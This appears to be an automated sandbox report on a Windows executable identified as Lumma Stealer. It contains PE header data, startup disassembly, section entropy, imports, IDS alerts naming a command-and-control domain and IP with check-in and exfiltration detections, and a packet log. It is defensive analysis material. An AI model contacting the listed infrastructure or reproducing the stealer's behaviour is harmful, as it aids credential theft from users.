                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:6
                                                                                          OS Version Minor:0
                                                                                          File Version Major:6
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:6
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:3ccbd572e5c574aa059c8de8b80553b8
                                                                                          Instruction
                                                                                          call 00007FF415352A0Ah
                                                                                          jmp 00007FF41535286Dh
                                                                                          mov ecx, dword ptr [004307C0h]
                                                                                          push esi
                                                                                          push edi
                                                                                          mov edi, BB40E64Eh
                                                                                          mov esi, FFFF0000h
                                                                                          cmp ecx, edi
                                                                                          je 00007FF415352A06h
                                                                                          test esi, ecx
                                                                                          jne 00007FF415352A28h
                                                                                          call 00007FF415352A31h
                                                                                          mov ecx, eax
                                                                                          cmp ecx, edi
                                                                                          jne 00007FF415352A09h
                                                                                          mov ecx, BB40E64Fh
                                                                                          jmp 00007FF415352A10h
                                                                                          test esi, ecx
                                                                                          jne 00007FF415352A0Ch
                                                                                          or eax, 00004711h
                                                                                          shl eax, 10h
                                                                                          or ecx, eax
                                                                                          mov dword ptr [004307C0h], ecx
                                                                                          not ecx
                                                                                          pop edi
                                                                                          mov dword ptr [00430800h], ecx
                                                                                          pop esi
                                                                                          ret
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          sub esp, 14h
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          xorps xmm0, xmm0
                                                                                          push eax
                                                                                          movlpd qword ptr [ebp-0Ch], xmm0
                                                                                          call dword ptr [0042E974h]
                                                                                          mov eax, dword ptr [ebp-08h]
                                                                                          xor eax, dword ptr [ebp-0Ch]
                                                                                          mov dword ptr [ebp-04h], eax
                                                                                          call dword ptr [0042E92Ch]
                                                                                          xor dword ptr [ebp-04h], eax
                                                                                          call dword ptr [0042E928h]
                                                                                          xor dword ptr [ebp-04h], eax
                                                                                          lea eax, dword ptr [ebp-14h]
                                                                                          push eax
                                                                                          call dword ptr [0042E9BCh]
                                                                                          mov eax, dword ptr [ebp-10h]
                                                                                          lea ecx, dword ptr [ebp-04h]
                                                                                          xor eax, dword ptr [ebp-14h]
                                                                                          xor eax, dword ptr [ebp-04h]
                                                                                          xor eax, ecx
                                                                                          leave
                                                                                          ret
                                                                                          mov eax, 00004000h
                                                                                          ret
                                                                                          push 00431B68h
                                                                                          call dword ptr [0042E994h]
                                                                                          ret
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          mov al, 01h
                                                                                          ret
                                                                                          push 00030000h
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x2e6f00x5a.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2e74a0x28.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1bcc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2e8c80x154.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x244ba0x24600c38052d5842cd8b07c8f812eb6910b36False0.5554459299828178data6.570338615727902IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x260000x9f740xa0003370e0b3d540bf8efa1a09679e10d998False0.4305419921875DOS executable (COM)4.93781731386841IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x300000x23300x1600e21ea4dbd16bf9c0820f2949a9c56684False0.3952414772727273data4.576677467448693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x350000x1bcc0x1c0043927976336ae0c9a639d5f9efc7a7d3False0.7833426339285714data6.549002942674606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                          .BSS0x370000x508000x5080046029f298e6ff67983eb46d6d69e0777False1.0003366411102483data7.999374639049402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                          DLLImport
                                                                                          KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObject, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                          NameOrdinalAddress
                                                                                          _SerializeData@1610x401e90
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2025-01-03T14:33:57.173114+01002058656ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)1192.168.2.5614871.1.1.153UDP
                                                                                          2025-01-03T14:33:57.665182+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549704104.21.32.1443TCP
                                                                                          2025-01-03T14:33:57.665182+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.32.1443TCP
                                                                                          2025-01-03T14:33:58.123850+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.32.1443TCP
                                                                                          2025-01-03T14:33:58.123850+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.32.1443TCP
                                                                                          2025-01-03T14:33:58.596355+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549705104.21.32.1443TCP
                                                                                          2025-01-03T14:33:58.596355+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.32.1443TCP
                                                                                          2025-01-03T14:33:59.081538+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.32.1443TCP
                                                                                          2025-01-03T14:33:59.081538+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.32.1443TCP
                                                                                          2025-01-03T14:33:59.785500+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549706104.21.32.1443TCP
                                                                                          2025-01-03T14:33:59.785500+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.32.1443TCP
                                                                                          2025-01-03T14:34:01.112954+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549707104.21.32.1443TCP
                                                                                          2025-01-03T14:34:01.112954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.32.1443TCP
                                                                                          2025-01-03T14:34:02.251726+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549708104.21.32.1443TCP
                                                                                          2025-01-03T14:34:02.251726+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.32.1443TCP
                                                                                          2025-01-03T14:34:04.770372+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549709104.21.32.1443TCP
                                                                                          2025-01-03T14:34:04.770372+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.32.1443TCP
                                                                                          2025-01-03T14:34:12.365477+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709104.21.32.1443TCP
                                                                                          2025-01-03T14:34:13.270327+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549710104.21.32.1443TCP
                                                                                          2025-01-03T14:34:13.270327+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.32.1443TCP
                                                                                          2025-01-03T14:34:15.612275+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.549716104.21.32.1443TCP
                                                                                          2025-01-03T14:34:15.612275+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716104.21.32.1443TCP
                                                                                          2025-01-03T14:34:16.050117+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549716104.21.32.1443TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 3, 2025 14:33:57.191173077 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:57.191231012 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:57.191302061 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:57.192483902 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:57.192498922 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:57.665050983 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:57.665182114 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:57.677970886 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:57.677989006 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:57.678308964 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:57.720886946 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:57.720902920 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:57.720968962 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.123867989 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.123958111 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.124007940 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.125361919 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.125380039 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.125407934 CET49704443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.125413895 CET44349704104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.135754108 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.135797977 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.135863066 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.136162996 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.136178970 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.596210957 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.596354961 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.597665071 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.597678900 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.598021984 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:58.599302053 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.599332094 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:58.599407911 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.081526041 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.081584930 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.081636906 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.081666946 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.081702948 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.081749916 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.081758022 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.081964016 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.081998110 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.082014084 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.082021952 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.082062006 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.082067966 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.086436987 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.086491108 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.086498976 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.131562948 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.131596088 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.168361902 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.168414116 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.168427944 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.168437958 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.168487072 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.168493032 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.168540955 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.168582916 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.168719053 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.168735027 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.168745995 CET49705443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.168751001 CET44349705104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.312927961 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.312999010 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.313067913 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.313441038 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.313455105 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.785409927 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.785500050 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.786705971 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.786716938 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.787039042 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:33:59.788378000 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.788556099 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:33:59.788589954 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:00.515064001 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:00.515173912 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:00.515238047 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:00.515403032 CET49706443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:00.515419960 CET44349706104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:00.648340940 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:00.648379087 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:00.648452997 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:00.648758888 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:00.648777008 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.112876892 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.112953901 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.114280939 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.114294052 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.114535093 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.115803957 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.116028070 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.116079092 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.116141081 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.163336039 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.614913940 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.615025043 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.615086079 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.615223885 CET49707443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.615243912 CET44349707104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.797843933 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.797897100 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:01.797988892 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.798316956 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:01.798337936 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:02.251594067 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:02.251725912 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:02.253402948 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:02.253420115 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:02.253654957 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:02.255286932 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:02.255444050 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:02.255481958 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:02.255549908 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:02.255562067 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:03.881117105 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:03.881233931 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:03.881294012 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:03.881469965 CET49708443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:03.881489038 CET44349708104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:04.317738056 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:04.317805052 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:04.317877054 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:04.318181038 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:04.318195105 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:04.770279884 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:04.770371914 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:04.771594048 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:04.771605015 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:04.771838903 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:04.773121119 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:04.773248911 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:04.773257017 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:12.365458965 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:12.365571976 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:12.365746975 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:12.365869045 CET49709443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:12.365885019 CET44349709104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:12.808293104 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:12.808365107 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:12.808453083 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:12.808756113 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:12.808794022 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.270239115 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.270327091 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.281821966 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.281862974 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.282104969 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.283196926 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.283981085 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.284029961 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.284162998 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.284218073 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.284348965 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.284403086 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.284574032 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.284631968 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.285200119 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.285263062 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.285480022 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.285525084 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.285545111 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.285576105 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.285734892 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.285777092 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.285820007 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.285903931 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.285963058 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.294202089 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.294456005 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.294512033 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.294557095 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.294599056 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:13.294702053 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:13.297753096 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.069550991 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.069643974 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.069719076 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.069938898 CET49710443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.069956064 CET44349710104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.141700983 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.141746998 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.141850948 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.142456055 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.142469883 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.612202883 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.612274885 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.613571882 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.613583088 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.613817930 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:15.620524883 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.620541096 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:15.620592117 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:16.050142050 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:16.050266981 CET44349716104.21.32.1192.168.2.5
                                                                                          Jan 3, 2025 14:34:16.050316095 CET49716443192.168.2.5104.21.32.1
                                                                                          Jan 3, 2025 14:34:16.050719023 CET49716443192.168.2.5104.21.32.1
